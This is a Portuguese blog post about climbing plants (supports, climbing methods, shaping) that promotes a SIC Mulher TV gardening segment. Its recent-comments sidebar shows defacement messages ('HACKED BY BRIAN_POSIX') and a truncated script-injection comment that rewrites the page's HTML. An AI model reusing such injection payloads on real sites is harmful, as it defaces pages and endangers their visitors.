Decor Verde @ 18:32

Seg, 18/03/13

Plantas Trepadeiras versus outro tipo de plantas!

A Trepadeira é uma planta que pela sua natureza necessita de um apoio para crescer na vertical e de podas de formação para atingir o tamanho e efeito que desejamos.

As trepadeiras são muito versáteis, pois proporcionam varias oportunidades de ideias para o Jardim, realçando uma parede, estrutura ou pérgula. Um dos aspectos interessantes é que as trepadeiras podem ajudar a tapar espaços ou zonas de menos interesse.

As trepadeiras mais populares têm aromas e cores intensas que nos proporcionam jardins magníficos e perfumados, como por exemplo o Jasmim, bougainvillea, etc.


Suportes e métodos de trepar:
Algumas trepadeiras não precisam de suporte pois têm métodos como raízes aéreas e agarram-se “autonomamente” a qualquer estrutura seja ela tronco, treliça ou parede como por ex. vinha, hera, ou maracujá.

Outras espécies necessitam de apoios para as ajudar a crescer e serem induzidas a trepar. A forma como cada trepadeira se adapta ao seu apoio depende da morfologia de cada planta. Por ex. a Glicínia ata-se da esquerda para a direita.

 

Trepadeiras versus outros Formatos:
As Trepadeiras têm algumas vantagens em relação a outro tipo de plantas, ao apoiarem-se numa estrutura conseguem atingir alturas e formatos que outras plantas não conseguem. O interessante é que uma planta trepadeira pode crescer noutros formatos se assim o desejarmos, ou seja a mesma planta pode ser induzida a crescer como trepadeira, arbusto, ou arvore…

 

Por isso não perca estes maravilhosos concelhos com Inês Oliveira, do Horto do Campo Grande, e Rui Reis, paisagista do Horto do Campo Grande.

No Mais Mulher desta terça-feira às 17:30 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 





Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO